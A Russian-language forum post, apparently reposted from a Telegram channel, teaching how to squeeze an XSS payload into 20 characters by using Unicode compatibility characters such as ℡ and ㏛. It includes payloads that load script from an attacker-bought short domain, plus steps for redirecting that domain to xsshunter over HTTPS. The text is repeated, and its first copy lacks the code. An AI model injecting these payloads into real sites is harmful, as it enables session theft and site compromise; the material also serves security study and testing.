D2
Администратор
- Регистрация
- 19 Фев 2025
- Сообщения
- 4,380
- Реакции
- 0
Межсайтовый скриптинг (XSS) - одна из самых распространенных уязвимостей, которую можно обнаружить чуть ли не на любом сайте в сети интернет (на некоторых, вроде Google и Amazon, придется хорошо поискать - в этих компаниях работают много разработчиков с большим опытом за плечами). Однако, иногда возникают проблемы - например, проблема в количестве символов, которое мы можем ввести, для эксплуатации данной уязвимости. В этом посте мы рассмотрим, как можно решить такую проблему, уложившись, например, лишь в 20 символов.
Совместимость с юникодом
В Unicode одни и те же сложные буквы, вроде Й, Ё, Ç и т.д., можно представить в двух формах - в виде одной буквы или в виде одной базовой буквы (например, «C») и модификаторов. Такой подход был введен в стандарт для обеспечения совместимости с существующими ранее стандартными наборами символов. Таким образом, стандарт нормализации Unicode описывает два вида отношений между символами: Canonical и Compatibility.
Каноническая эквивалентность предполагает, что последовательность двух кодовых пунктов является полностью взаимозаменяемой. Т.е., комбинация из двух символов может быть канонически эквивалентна одному символу - n (маленькая латинская "n" - U+006E) + ◌̃ (тильда - U+0303) = ñ (маленькая латинская "ñ" - U + 00F1).
Совместимая эквивалентность предполагает, что две совместимые последовательности кодовых пунктов выглядят по-разному, но в некоторых ситуациях могут быть взаимозаменяемыми. Например, два латинских символа f, т.е. "ff" (U + 0066 U + 0066), имеют эквивалент одному символу "ff" (U+FB00), но не всегда. По сути, мы видим один и тот же текст, однако последовательность символов не является строго эквивалентной (до тех пор, пока мы не проведем нормализацию).
Проблема с лимитом ввода в 20 символов
Итак, мы нашли уязвимый сайт. Наш пейлоад выглядит так:
Код: Скопировать в буфер обмена
Это то, что мы смогли сделать, имея лимит в 20 символов - остальная часть, что бы мы не вводили, обрезается. Таким образом, мы имеем проблему, ведь "alert" - это не серьезно, мы же просто выведем пустое сообщение на экран. Подгрузка скрипта со своего домена (в обход CORS, конечно же) была бы идеальной и дала бы нам гораздо больше преимуществ для подготовки более сложной атаки.
Особенности Unicode в браузерах
Не для кого не секрет, что в современных браузерах нет никаких проблем с кодировками, как это было раньше. А это значит, что нам ничего не помешает реализовать нашу шалость.
Рассмотрим следующий пейлоад:
Код: Скопировать в буфер обмена
Попробуйте скопировать символы, находящиеся между слезшем и точкой. Заметили? В примере выше, "ff" - это один символ, однако выглядит он как две латинских "f". В таком случае, браузер поведет себя так - он просто интерпретирует "ff" как два символа. Это дает нам огромное преимущество.
Вот ещё примеры символов, которые мы можем использовать:
Реализация
Давайте купим домен
Как видите, стоит он не дорого - всего 1.28$.
Если мы будем использовать в нашем пейлоаде только стандартные символы, получится, что мы превысим допустимый лимит в 20 символов.
Заменим их на эквиваленты:
Код: Скопировать в буфер обмена
Кажется, мы добились поставленной задачи.
Дальнейшие шаги
Выглядит отлично, но мы не учли одну деталь - если на уязвимом сайте будет использоваться HTTPS-протокол, то при импорте любого скрипта, он будет подружаться по этому же протоколу.
Я задумал реализовать DNS-редирект с
И тут появляется ещё одна проблема - так как используется протокол HTTPS, если мы выполним перенаправление при помощи DNS на другой сайт, произойдет несоответствие сертификата, и файл Javascript не будет загружен.
Решается такая проблема следующим образом:
Источник: https://t.me/cybred
Совместимость с юникодом
В Unicode одни и те же сложные буквы, вроде Й, Ё, Ç и т.д., можно представить в двух формах - в виде одной буквы или в виде одной базовой буквы (например, «C») и модификаторов. Такой подход был введен в стандарт для обеспечения совместимости с существующими ранее стандартными наборами символов. Таким образом, стандарт нормализации Unicode описывает два вида отношений между символами: Canonical и Compatibility.
Каноническая эквивалентность предполагает, что последовательность двух кодовых пунктов является полностью взаимозаменяемой. Т.е., комбинация из двух символов может быть канонически эквивалентна одному символу - n (маленькая латинская "n" - U+006E) + ◌̃ (тильда - U+0303) = ñ (маленькая латинская "ñ" - U + 00F1).
Совместимая эквивалентность предполагает, что две совместимые последовательности кодовых пунктов выглядят по-разному, но в некоторых ситуациях могут быть взаимозаменяемыми. Например, два латинских символа f, т.е. "ff" (U + 0066 U + 0066), имеют эквивалент одному символу "ff" (U+FB00), но не всегда. По сути, мы видим один и тот же текст, однако последовательность символов не является строго эквивалентной (до тех пор, пока мы не проведем нормализацию).
Проблема с лимитом ввода в 20 символов
Итак, мы нашли уязвимый сайт. Наш пейлоад выглядит так:
Код: Скопировать в буфер обмена
<svg/onload=alert``>Это то, что мы смогли сделать, имея лимит в 20 символов - остальная часть, что бы мы не вводили, обрезается. Таким образом, мы имеем проблему, ведь "alert" - это не серьезно, мы же просто выведем пустое сообщение на экран. Подгрузка скрипта со своего домена (в обход CORS, конечно же) была бы идеальной и дала бы нам гораздо больше преимуществ для подготовки более сложной атаки.
Особенности Unicode в браузерах
Не для кого не секрет, что в современных браузерах нет никаких проблем с кодировками, как это было раньше. А это значит, что нам ничего не помешает реализовать нашу шалость.
Рассмотрим следующий пейлоад:
Код: Скопировать в буфер обмена
<script src=//ffff.pw>Попробуйте скопировать символы, находящиеся между слезшем и точкой. Заметили? В примере выше, "ff" - это один символ, однако выглядит он как две латинских "f". В таком случае, браузер поведет себя так - он просто интерпретирует "ff" как два символа. Это дает нам огромное преимущество.
Вот ещё примеры символов, которые мы можем использовать:
- ff экивалентен
ff - ℠ экивалентен
sm - ㏛ экивалентен
sr - st экивалентен
st - ㎭ экивалентен
rad - ℡ экивалентен
tel
Реализация
Давайте купим домен
telsr.pw.Как видите, стоит он не дорого - всего 1.28$.
Если мы будем использовать в нашем пейлоаде только стандартные символы, получится, что мы превысим допустимый лимит в 20 символов.
Заменим их на эквиваленты:
Код: Скопировать в буфер обмена
<script src=//℡㏛.pw>Кажется, мы добились поставленной задачи.
Дальнейшие шаги
Выглядит отлично, но мы не учли одну деталь - если на уязвимом сайте будет использоваться HTTPS-протокол, то при импорте любого скрипта, он будет подружаться по этому же протоколу.
Я задумал реализовать DNS-редирект с
telsr.pw на xsshunter.com.И тут появляется ещё одна проблема - так как используется протокол HTTPS, если мы выполним перенаправление при помощи DNS на другой сайт, произойдет несоответствие сертификата, и файл Javascript не будет загружен.
Решается такая проблема следующим образом:
- Покупаем хостинг для нашего домена, я использую namecheap.com за 1.44$/месяц.
- Выпускаем для него HTTPS сертификат (бесплатно от Let's Encrypt)
- Загружаем простой HTML-файл c соответствующим мета тегом для редиректа, либо пишем PHP-скрипт, либо используем .htaccess. Тут уже дело вкуса. Объяснять, как это делается, я не буду - все гуглится одной строчкой, реализация аналогична.
Источник: https://t.me/cybred